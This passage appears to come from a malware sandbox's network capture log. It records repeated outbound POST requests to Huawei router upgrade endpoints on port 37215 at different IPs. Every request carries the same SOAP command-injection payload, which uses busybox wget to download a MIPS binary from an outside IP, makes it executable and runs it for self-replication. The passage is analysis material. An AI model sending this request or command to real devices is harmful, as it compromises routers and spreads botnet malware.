                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1591192.168.2.234296441.92.241.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555473089 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1592192.168.2.234843892.129.224.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555506945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1593192.168.2.2346920193.68.19.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555516005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1594192.168.2.2354350157.169.155.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555536032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1595192.168.2.2356454197.57.19.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555542946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1596192.168.2.2350382157.44.134.24537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555545092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1597192.168.2.234130641.153.181.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555561066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1598192.168.2.2352352197.185.232.17037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555586100 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1599192.168.2.233484841.166.61.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555615902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1600192.168.2.2354844197.164.171.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555665016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
